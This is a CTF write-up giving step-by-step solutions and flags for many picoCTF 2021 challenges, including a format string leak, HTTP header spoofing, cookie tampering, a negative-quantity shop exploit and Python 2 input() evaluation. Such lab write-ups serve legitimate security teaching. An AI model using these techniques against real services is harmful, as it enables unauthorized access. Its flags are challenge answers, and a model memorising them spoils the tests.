picoCTF2021

Python Wrangling
Description 

Python scripts are invoked kind of like programs in the Terminal... Can you run this Python script using this password to get the flag? 

Solution:
kali@kali:~/Desktop$ python3 ende.py -d flag.txt.en 

Please enter the password:68f88f9368f88f9368f88f9368f88f93 

picoCTF{4p0110_1n_7h3_h0us3_68f88f93} 

kali@kali:~/Desktop$  

Binary Gauntlet 0 

Description 

This series of problems has to do with binary protections and how they affect exploiting a very simple program. How far can you make it in the gauntlet?
gauntlet nc -v mercury.picoctf.net 12294 

Solution: 

Download the program. First use strings command to check out plaintext contents. Looks it uses some insecure string command. It also shows requiring an input file called flag.txt. So we can create a local flag file and see what happens. 

This is about format string attack.  

https://nikhilh20.medium.com/format-string-exploit-ccefad8fd66b  

kali@kali:~/Desktop/pico$ ./gauntlet flag.txt 

%7$s 

asasasa 

Above string of "asasasa" is the content of my flag file. So we know %7$s gives out the flag. 

kali@kali:~/Desktop/pico$ nc -v mercury.picoctf.net 12294 

DNS fwd/rev mismatch: mercury.picoctf.net != ec2-18-189-209-142.us-east-2.compute.amazonaws.com 

mercury.picoctf.net [18.189.209.142] 12294 (?) open 

%7$s 

fbd01d62c0e369e6de3d63b4b21d3830 

Wave a flag
Description 

Can you invoke help flags for a tool or binary? This program has extraordinarily helpful information... 

Solution:
kali@kali:~/Desktop/pico$ ./warm -h 

Oh, help? I actually don't do much, but I do have this flag here: picoCTF{b1scu1ts_4nd_gr4vy_6635aa47} 

kali@kali:~/Desktop/pico$  

Information
Description 

Files can always be changed in a secret way. Can you find the flag? cat.jpg
Solution: 

kali@kali:~/Desktop/pico$ strings cat.jpg > cat.txt 

kali@kali:~/Desktop/pico$ leafpad cat.txt  

kali@kali:~/Desktop/pico$ exiftool cat.jpg  

Notice the lines: 

Current IPTC Digest         : 7a78f3d9cfb1ce42ab5a3aa30573d617 

Copyright Notice            : PicoCTF 

Digest is based-64 encoded, decode it and get 

picoCTF{the_m3tadata_1s_modified} 

Nice netcat
Description 

There is a nice program that you can talk to by using this command in a shell: $ nc mercury.picoctf.net 49039, but it doesn't speak English... 

Solution: 

Connect to the port and notice receiving a bunch of decimal numbers 

kali@kali:~/Desktop/pico$ nc mercury.picoctf.net 49039 > net.txt
kali@kali:~/Desktop/pico$ cat net.txt | tr '\012' ' ' 

112  105  99  111  67  84  70  123  103  48  48  100  95  107  49  116  116  121  33  95  110  49  99  51  95  107  49  116  116  121  33  95  51  100  56  52  101  100  99  56  125  10  

Goto online converter at https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html and get the flag 

picoCTF{g00d_k1tty!_n1c3_k1tty!_3d84edc8} 

Weird File 

Description 

What could go wrong if we let Word documents run programs? (aka "in-the-clear"). Download file. 

Solution: 

Once open file in Microsoft Word, enable edit, then go to View-> Macros->Macros in weird.docm,  open the function runpython and find the string 

Ret_Val = Shell("python -c 'print(\"cGljb0NURnttNGNyMHNfcl9kNG5nM3IwdXN9\")'" & " " & Args, vbNormalFocus) 

Convert base64 string to flag  

picoCTF{m4cr0s_r_d4ng3r0us} 

GET aHEAD 

Description 

Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:28916/ 

Solution: 

Notice the HTTP response purely relies on the HTTP method in the HTTP request. Right now it sends either GET or POST to get different results. What if I change the the HTTP method to HEAD? Intercept the traffic with burp. 

picoCTF{r3j3ct_th3_du4l1ty_70bc61c4}

Transformation 

Description 

I wonder what this really is... enc 

Solution:
Analyse shows the content is Unicode encoded. So try to decode this string at https://www.online-toolz.com/tools/text-unicode-entities-convertor.php  

From "灩捯䍔䙻ㄶ形楴獟楮獴㌴摟潦弸彥㜰㍢㐸㙽" to "%u7069%u636F%u4354%u467B%u3136%u5F62%u6974%u735F%u696E%u7374%u3334%u645F%u6F66%u5F38%u5F65%u3730%u3362%u3438%u367D" 

It looks getting rid of %u and it will turn into hex-coded ascii.  

kali@kali:~/Desktop/pico$ echo "%u7069%u636F%u4354%u467B%u3136%u5F62%u6974%u735F%u696E%u7374%u3334%u645F%u6F66%u5F38%u5F65%u3730%u3362%u3438%u367D" > enc2 

kali@kali:~/Desktop/pico$ sed 's/%u//g' enc2 

7069636F4354467B31365F626974735F696E73743334645F6F665F385F65373033623438367D 

kali@kali:~/Desktop/pico$ sed 's/%u//g' enc2 | xxd -r -p 

picoCTF{16_bits_inst34d_of_8_e703b486} 

kali@kali:~/Desktop/pico$ 

Static ain't always noise 

Description 

Can you look at the data in this binary: static? This BASH script might help! 

Solution: 

kali@kali:~/Desktop/pico$ strings static  

Will find the flag 

picoCTF{d15a5m_t34s3r_ae0b3ef2} 

Tab, Tab, Attack
Description 

Using tabcomplete in the Terminal will add years to your life, esp. when dealing with long rambling directory structures and filenames: Addadshashanammu.zip 

Solution:
Just unzip and go deep to the last directory and run 

$ strings fang-of-haynekhtnamet | grep pico                                                                     

*ZAP!* picoCTF{l3v3l_up!_t4k3_4_r35t!_a00cae70} 

keygenme-py
Description 

keygenme-trial.py 

Solution: 

Read the code. Notice the flag contains static and dynamic part. Need to figure out dynamic part.  

Run the code step by step in python console, replace the input with the real variable. 

kali@kali:~$ python3 

Python 3.8.2 (default, Apr  1 2020, 15:52:55)  

[GCC 9.3.0] on linux 

Type "help", "copyright", "credits" or "license" for more information. 

>>> import hashlib 

>>> from cryptography.fernet import Fernet 

>>> import base64 

>>> username_trial = "ANDERSON" 

>>> bUsername_trial = b"ANDERSON" 

>>> hashlib.sha256(username_trial).hexdigest()[4] 

Traceback (most recent call last): 

  File "<stdin>", line 1, in <module> 

TypeError: Unicode-objects must be encoded before hashing 

>>> hashlib.sha256(bUsername_trial).hexdigest()[4] 

'0' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[5] 

'1' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[3] 

'5' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[6] 

'8' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[2] 

'2' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[7] 

'4' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[1] 

'1' 

>>> hashlib.sha256(bUsername_trial).hexdigest()[8] 

'9' 

Put together we get the final flag as: 

picoCTF{1n_7h3_|<3y_of_01582419} 

Matryoshka doll
Description 

Matryoshka dolls are a set of wooden dolls of decreasing size placed one inside another. What's the final one? Image: this
Solution: 

Use binwalk to extract embedded zip file from image file, and repeat the process till you get the flag file. 

https://book.hacktricks.xyz/stego/stego-tricks  

https://trailofbits.github.io/ctf/forensics/  

kali@kali:~/Desktop/pico$ binwalk -e dolls.jpg  

picoCTF{bf6acf878dcbd752f4721e41b1b1b66b} 

crackme-py 

Description 

crackme.py 

Solution: 

Inspect the source code. Notice it already has decrypt function. Just need to run the function in the program. Add two line program: 

print ("the secret is")  

    decode_secret(bezos_cc_secret) 

And get the flag: 

picoCTF{1|\/|_4_p34|\|ut_a79b6c2d} 

Magikarp Ground Mission 

Description 

Do you know how to move between directories and read files in the shell? Start the container, `ssh` to it, and then `ls` once connected to begin. Login via `ssh` as `ctf-player` with the password, `6dee9772` 

Solution: 

This one is easy. Just follow the instruction to get all three pieces of information for the flag. 

After ssh to the machine: 

picoCTF{xxsh_0ut_0f_\/\/4t3r_540e4e79} 

Cookies 

Description 

Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:64944/ 

Solution: 

Check out the site, and notice it uses a cookie called name=-1. Think to change cookie value to see what happens.  

Browser tool does not help too much here. Use burp to intercept traffic. 

Notice the sequence, try to send each packet to repeater and change cookie value. 

The third packet actually responds differently if you modify cookie value. Keep changing the value until the final flag shows up. 

picoCTF{3v3ry1_l0v3s_c00k135_cc9110ba} 

Wireshark doo dooo do doo...
Description 

Can you find the flag? shark1.pcapng 

Solution: 

Open the file with wireshark. Try to search for work like pico or CTF but nothing is found.  

Next step is to look for TCP connection content.  

Once search for "tcp.stream eq 5", you see content like in a flag format: 

Gur synt vf cvpbPGS{c33xno00_1_f33_h_qrnqorrs} 

Convert this with Caesar Cipher, you get 

picoCTF{p33kab00_1_s33_u_deadbeef} 

speeds and feeds 

Description 

There is something on my shop network running at nc mercury.picoctf.net 33596, but I can't tell what it is. Can you? 

Solution: 

After connecting to the port, it displays a longlist of like this: 

G0Z0.1 

G0X194.8276Y3.3103 

G1Z0.1 

G1X195.3793Y3.5862 

G1X195.6552Y4.1379 

G1X195.6552Y4.9655 

G1X195.3793Y5.5172 

G1X194.8276Y5.7931 

G0Z0.1 

Export all the results to a local file. 

kali@kali:~/Desktop/pico$ nc mercury.picoctf.net 33596 > my.txt 

Need to figure out what kind of codes they are.  

Take the hint "What language does a CNC machine use?" 

Google search "What language does a CNC machine use?" And find it is called G-Code. 

Google search "g-code simulator online" 

https://ncviewer.com/ 

Upload saved file and you get the flag: 

picoCTF{num3r1cal_c0ntr0l_e7749028} 

Shop 

Description 

Best Stuff - Cheap Stuff, Buy Buy Buy... Store Instance: source. The shop is open for business at nc mercury.picoctf.net 24851. 

Solution: 

Download the source code, extract strings but it does not help much. 

Connect to the port, it looks running a shopping application. The hint says considering corner case. 

Exploring around and notice you can earn money by purchasing negative amount of items. Then get the idea that Fruitful Flag has the flag you need to buy with 100 coins. 

kali@kali:~/Desktop/pico$ nc mercury.picoctf.net 24851 

Welcome to the market! 

===================== 

You have 40 coins 

     Item        Price   Count 

(0) Quiet Quiches   10  12 

(1) Average Apple   15  8 

(2) Fruitful Flag   100 1 

(3) Sell an Item 

(4) Exit 

Choose an option:  

0 

How many do you want to buy? 

-1 

You have 50 coins 

     Item        Price   Count 

(0) Quiet Quiches   10  13 

(1) Average Apple   15  8 

(2) Fruitful Flag   100 1 

(3) Sell an Item 

(4) Exit 

Choose an option:  

0 

How many do you want to buy? 

-10000000000000 

You have 50 coins 

     Item        Price   Count 

(0) Quiet Quiches   10  13 

(1) Average Apple   15  8 

(2) Fruitful Flag   100 1 

(3) Sell an Item 

(4) Exit 

Choose an option:  

0        

How many do you want to buy? 

-2 

You have 70 coins 

     Item        Price   Count 

(0) Quiet Quiches   10  15 

(1) Average Apple   15  8 

(2) Fruitful Flag   100 1 

(3) Sell an Item 

(4) Exit 

Choose an option:  

0 

How many do you want to buy? 

-3 

You have 100 coins 

     Item        Price   Count 

(0) Quiet Quiches   10  18 

(1) Average Apple   15  8 

(2) Fruitful Flag   100 1 

(3) Sell an Item 

(4) Exit 

Choose an option:  

2 

How many do you want to buy? 

1 

Flag is:  [112 105 99 111 67 84 70 123 98 52 100 95 98 114 111 103 114 97 109 109 101 114 95 53 51 50 98 99 100 57 56 125] 

Convert this decimal to ascii we get the flag: 

picoCTF{b4d_brogrammer_532bcd98} 

What's your input? 

Description 

We'd like to get your input on a couple things. Think you can answer my questions correctly? in.py nc mercury.picoctf.net 13142 

Solution: 

Download the source code in.py. Look at the code. Looks the first question actually doesn't matter. The second question you need to get the right answer to get the flag.  

Connect to the site, run some examples: 

kali@kali:~/Desktop/pico$ nc mercury.picoctf.net 13142 

What's your favorite number? 

Number? 34 

You said: 34 

Okay... 

What's the best city to visit? 

City? London 

City? 1==2 

You said: False 

City? 1-1=0 

City? 1==1 

You said: True 

Thanks for your input! 

Interesting, it looks when you enter a city name, it does not take the result. Instead if you enter a logic expression, it will evaluate it and show False or True.  

Try the code in local machine, it appears to be a behavior from Python version 2.7. In Python version 3 it works as expected.  

kali@kali:~/Desktop/pico$ python 

Python 2.7.18 (default, Apr 20 2020, 20:30:41)  

[GCC 9.3.0] on linux2 

Type "help", "copyright", "credits" or "license" for more information. 

>>> res = input("City? ") 

City? London 

Traceback (most recent call last): 

  File "<stdin>", line 1, in <module> 

  File "<string>", line 1, in <module> 

NameError: name 'London' is not defined 

>>> London 

Traceback (most recent call last): 

  File "<stdin>", line 1, in <module> 

NameError: name 'London' is not defined 

>>> res = input("City? ") 

City? 1==1 

>>> print("You said: {}".format(res)) 

You said: True 

Google search "python 2.7 input name is not defined", find this one: 

https://stackoverflow.com/questions/21122540/input-error-nameerror-name-is-not-defined  

Follow the idea from above article: 

kali@kali:~/Desktop/pico$ nc mercury.picoctf.net 13142 

What's your favorite number? 

Number? 23 

You said: 23 

Okay... 

What's the best city to visit? 

City? city 

You said: Nashville 

I agree! 

picoCTF{v4lua4bl3_1npu7_4379065} 

Scavenger Hunt 

Description 

There is some interesting information hidden around this site http://mercury.picoctf.net:55079/. Can you find it? 

Solution: 

The pieces of flag are scattered in different places. Need to find them all. 

First piece, check homepage source code 

<!-- Here's the first part of the flag: picoCTF{t --> 

 Second piece, check css source code at mycss.css within developer tool: 

/* CSS makes the page look nice, and yes, it also has part of the flag. Here's part 2: h4ts_4_l0 */ 

Third piece, in myjs.js from developer tool, there is a hint "/* How can I keep Google from indexing my website? */" 

so check the robots.txt 

# Part 3: t_0f_pl4c 

 And there is a hint "# I think this is an apache server... can you Access the next flag?" 

Fourth piece: 

http://mercury.picoctf.net:55079/.htaccess 

# Part 4: 3s_2_lO0k 

 With a hint "# I love making websites on my Mac, I can Store a lot of information there." 

Fifth piece: 

This is the hardest one. At the beginning I thought it was index.html.en which was mentioned in many posts. Google a lot of places and finally find this: https://logicintel.com/removing-ds_store-files-on-linux-server/  

http://mercury.picoctf.net:55079/.DS_Store 

Congrats! You completed the scavenger hunt. Part 5: _74cceb07} 

So put all the pieces together and the flag is: 

picoCTF{th4ts_4_l0t_0f_pl4c3s_2_lO0k_74cceb07} 

MacroHard WeakEdge 

Description 

I've hidden a flag in this file. Can you find it? Forensics is fun.pptm 

Solution: 

Tried first with File->INFO->Inspect Presentation, and then View->Macro, nothing found. 

Then tried to check metadata and other hidden info online at https://products.aspose.app/slides/family without luck. 

More research about pptm file format leads me this article: 

https://docs.fileformat.com/presentation/pptm/  

So pptm extension actually is a zip file. 

Change the file extension from pptm to zip, then unzip it.  

Tried grep command but didn't find anything with pico or CTF. 

kali@kali:~/Desktop/pico$ grep pico -r ./Forensics_is_fun_2/* 

kali@kali:~/Desktop/pico$ grep CTF -r ./Forensics_is_fun_2/* 

Look at the unzipped folder, notice there's file called hidden under ppt->slideMasters 

Get rid of the space, then base64 decode it and you get the flag: 

kali@kali:~/Desktop/pico/Forensics_is_fun_2/docProps$ echo "Z m x h Z z o g c G l j b 0 N U R n t E M W R f d V 9 r b j B 3 X 3 B w d H N f c l 9 6 M X A 1 f Q" | sed 's/ //g' | base64 -d 

flag: picoCTF{D1d_u_kn0w_ppts_r_z1p5} 

kali@kali:~/Desktop/pico/Forensics_is_fun_2/docProps$  

Who are you?
Description 

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:34588/ 

Solution: 

This challenge includes series of questions you have to meet in the HTTP request. 

Use burp to intercept a request then send to repeater. 

First one is obvious:  only use PicoBrowser: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PicoBrowser 

Next one: don't trust user from another site. Add header 

Referer: http://mercury.picoctf.net:34588 

Next one: site only available for 2018. Add header 

Date: Tue, 15 Nov 2018 08:12:31 GMT 

Next one: don't like user to be tracked. Add header 

DNT: 0  (Do Not Track header) 

Next one: only accept users from Sweden. This means we need to tell web server my client IP is from Sweden. Add header 

X-Forwarded-For: 31.15.33.12 (you can google search Sweden IP) 

Last one: you need to speak Sweden. Turns out there is a web browser language identification code. Add Swedish: 

Accept-Language: en-US,en;q=0.9,sv 

And you will get the flag: 

picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_79e451a7} 

Some Assembly Required 1 

Description 

http://mercury.picoctf.net:40226/index.html 

Solution: 

Connect to the site, enter some random inputs. Then open developer tool, observe network tab and notice no traffic is captured. Refresh the page, find there is a request to JIFxzHyW8W. Check its response and find the flag: 

picoCTF{cb688c00b5a2ede7eaedcae883735759} 

This one actually is easier than some earlier questions. 

Some Assembly Required 2 

 | 110 points 

Tags: picoCTF 2021Web Exploitation 

AUTHOR: SEARS SCHULZ 

Description 

http://mercury.picoctf.net:44570/index.html 

Similar to Some Assembly Required 1 challenge, use burp to intercept traffic.  

Notice the traffic to /aD8SvhyVkb 

At the end there is a string 

 
+xakgK\Ns><m:i1>1991:nkjl<ii1j0n=mm09 

Use cyberchef magic block, choose Intensive Mode 

picoCTF{64e2a9691192fcbd4aa9b8f5ee8134a2}